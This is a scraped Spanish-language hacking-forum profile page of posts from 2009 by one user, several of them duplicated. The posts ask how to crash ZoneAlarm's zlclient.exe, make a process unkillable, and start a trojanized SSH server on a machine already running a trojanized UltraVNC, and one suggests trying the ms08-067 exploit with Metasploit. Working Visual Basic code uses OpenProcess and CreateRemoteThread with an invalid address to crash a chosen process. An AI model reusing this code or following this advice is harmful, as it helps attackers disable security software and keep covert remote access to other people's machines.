El tema es que quiero que sea critico, para que sea unkillable, pero no quiero que me haga guru meditation cada vez q se cierra, quiero q de una advertencia o algo asi.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1312
Programación Visual Basic / Critical Process.
20 Diciembre 2009, 18:02 PM
Hola! Como va todo?
Bueno, miren tengo un tema...
Como hago para que un programa que tiene el RtlProcessIsCrital token activado no me haga un BSOD si lo quiero apagar sino q me diga como muchos de los critical processes de windows "Este proceso es critico para el sistema y no se puede terminar".
Hay alguna manera? (Sin usar drivers para hookear el exitprocess).
Un abrazo
APOKLIPTICO
PD: Es peligroso q ande haciendo guru meditation todo el tiempo, se te caga el kernel de nada (Comprobado en una VM).
Bueno, miren tengo un tema...
Como hago para que un programa que tiene el RtlProcessIsCrital token activado no me haga un BSOD si lo quiero apagar sino q me diga como muchos de los critical processes de windows "Este proceso es critico para el sistema y no se puede terminar".
Hay alguna manera? (Sin usar drivers para hookear el exitprocess).
Un abrazo
APOKLIPTICO
PD: Es peligroso q ande haciendo guru meditation todo el tiempo, se te caga el kernel de nada (Comprobado en una VM).
#1313
Programación Visual Basic / Re: Crasheando un Proceso.
20 Diciembre 2009, 02:32 AM
Perdon x el double posting.
Descubrí q el problema es q el zlclient.exe me está bloqueando la llamada al openprocess, con o sin el sedebugprivileges. Hay alguna manera de bypassear eso? Sin tener q usar drivers...
PD: En caso de que no se pueda, alguien me orientaría a algun site q me pueda explicar bien como programar un driver para este fin??? (Se C++, me imagino q no se puede hacer un driver en VB).
Descubrí q el problema es q el zlclient.exe me está bloqueando la llamada al openprocess, con o sin el sedebugprivileges. Hay alguna manera de bypassear eso? Sin tener q usar drivers...
PD: En caso de que no se pueda, alguien me orientaría a algun site q me pueda explicar bien como programar un driver para este fin??? (Se C++, me imagino q no se puede hacer un driver en VB).
#1314
Programación Visual Basic / Re: Crasheando un Proceso.
19 Diciembre 2009, 19:06 PM
Okay, creo q ya tengo el sedebugprivileges (hay alguna manera de comprobarlo???)
El problema es que me sigue sin inyectar la memoria...
El proceso q estoy tratando de crashear es el zlclient.exe del zonealarm
PD: El cheatengine tiene una funcion createprocess y crashea el zonealarm, pero no se como lo hace... Supongo que dbe hacerlo en modo kernel cargando un driver, pero no estoy seguro...
El problema es que me sigue sin inyectar la memoria...
El proceso q estoy tratando de crashear es el zlclient.exe del zonealarm
PD: El cheatengine tiene una funcion createprocess y crashea el zonealarm, pero no se como lo hace... Supongo que dbe hacerlo en modo kernel cargando un driver, pero no estoy seguro...
#1315
Programación Visual Basic / Re: Crasheando un Proceso.
18 Diciembre 2009, 17:52 PM
Perdón x revivir el post (son solo 7 dias), esta funcionando bien, el problema es que algunos procesos no se les puede inyectar memoria aleatoriamente, x ejemplo, el zonealarm, para crashearlo, me tira un acceso denegado...
Otros procesos falla la inyección de memoria...
Hay alguna manera de que ande?
Otros procesos falla la inyección de memoria...
Hay alguna manera de que ande?
#1316
Hacking / Re: Shutdown -m \\EQUIPO acceso denegado
16 Diciembre 2009, 17:43 PM
Hola! Bueno, mira, para usar el comando shutdown, tenes q tener privilegios mayores al de un invitado, cuando usas el comando shutdown, se conecta a la share IPC$ que te logueas como invitado. Lo q necesitas es una cuenta de usuario remota. Podes fijarte si tiene alguna vuln explotable, como la ms08-067, bajate el metasploit y fijate. Si se te metió en la red Wi-Fi, agarras, pones una buena y fuerte contraseña alfanumerica de mas de 10 caracteres y cifrado WPA2-AES-CCMP y estas, no se te mete ni dios.
Un abrazo
APOKLIPTICO
Un abrazo
APOKLIPTICO
#1317
Hacking / Ejecutando un programa con UltraVNC
15 Diciembre 2009, 22:37 PM
Hola gente, miren, tengo este problema...
Tengo una computadora con un UltraVNC troyanizado y quiero instalar un ssh troyanizado que tengo, para poder tener una shell. Mi pregunta es esta: Como hago?
Probé reemplazando el taskmgr.exe y mandando un "ctrl+alt+del" pero no me deja reemplazar el taskmgr.exe x alguna razon, hay alguna manera de hacerlo???
Puedo bajar y subir archivos del server, asi como eliminar.
El ssh troyanizado ya está subido, le puse un acceso directo en la carpeta inicio para que se ejecute en el siguiente reinicio, pero me gustaría que se inicie ahora.
A alguien se le ocurre como puedo hacerlo???
Un abrazo
APOKLIPTICO
PD: El SO del Host es Windows XP SP3.
Tengo una computadora con un UltraVNC troyanizado y quiero instalar un ssh troyanizado que tengo, para poder tener una shell. Mi pregunta es esta: Como hago?
Probé reemplazando el taskmgr.exe y mandando un "ctrl+alt+del" pero no me deja reemplazar el taskmgr.exe x alguna razon, hay alguna manera de hacerlo???
Puedo bajar y subir archivos del server, asi como eliminar.
El ssh troyanizado ya está subido, le puse un acceso directo en la carpeta inicio para que se ejecute en el siguiente reinicio, pero me gustaría que se inicie ahora.
A alguien se le ocurre como puedo hacerlo???
Un abrazo
APOKLIPTICO
PD: El SO del Host es Windows XP SP3.
#1318
Programación Visual Basic / Re: Crasheando un Proceso.
11 Diciembre 2009, 15:30 PM
Gente, muchas gracias, funciona de maravillas.
Aki esta la funcion completa:
Un abrazo
APOKLIPTICO
Aki esta la funcion completa:
Código (vb) [Seleccionar]
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal Hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "KERNEL32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function CloseHandle Lib "KERNEL32" (ByVal hObject As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal Classname As String, ByVal WindowName As String) As Long
Private Declare Function CreateRemoteThread Lib "KERNEL32" (ByVal hProcess As Long, ByRef lpThreadAttributes As Any, ByVal dwStackSize As Long, ByRef lpStartAddress As Long, ByRef lpParameter As Any, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Function CrashProg(ByVal Address As Long, ByVal WindowName As String)
Dim Handle As Long
Dim PID As Long
Dim Hwnd As Long
Dim ret
Hwnd = FindWindow(vbNullString, WindowName)
GetWindowThreadProcessId Hwnd, PID
Handle = OpenProcess(PROCESS_ALL_ACCESS, False, PID)
ret = CreateRemoteThread(Handle, ByVal 0&, 0, Address, ByVal 0&, 0, ByVal 0&)
Call CloseHandle(Handle)
End FunctionUn abrazo
APOKLIPTICO
#1319
Programación Visual Basic / Re: Crasheando un Proceso.
11 Diciembre 2009, 02:53 AMCita de: Karcrack en 10 Diciembre 2009, 22:27 PMCódigo (vb) [Seleccionar]'KERNEL32
Private Declare Function CreateRemoteThread Lib "KERNEL32" (ByVal hProcess As Long, ByRef lpThreadAttributes As Any, ByVal dwStackSize As Long, ByRef lpStartAddress As Long, ByRef lpParameter As Any, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
Private Declare Function OpenProcess Lib "KERNEL32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Function CrashProc(ByVal lPID As Long) As Boolean
CrashProc = CreateRemoteThread(OpenProcess(&H1F0FFF, ByVal 0&, lPID), ByVal 0&, 0, ByVal &HCACACACA, ByVal 0&, 0, ByVal 0&)
End Function
YES! Esto es lo q necesitaba, en cuanto pueda lo pruebo.
Ahora estoy muy ocupado jugando CoD4 MW y viendo the big bang theory XD
GRACIAS!!!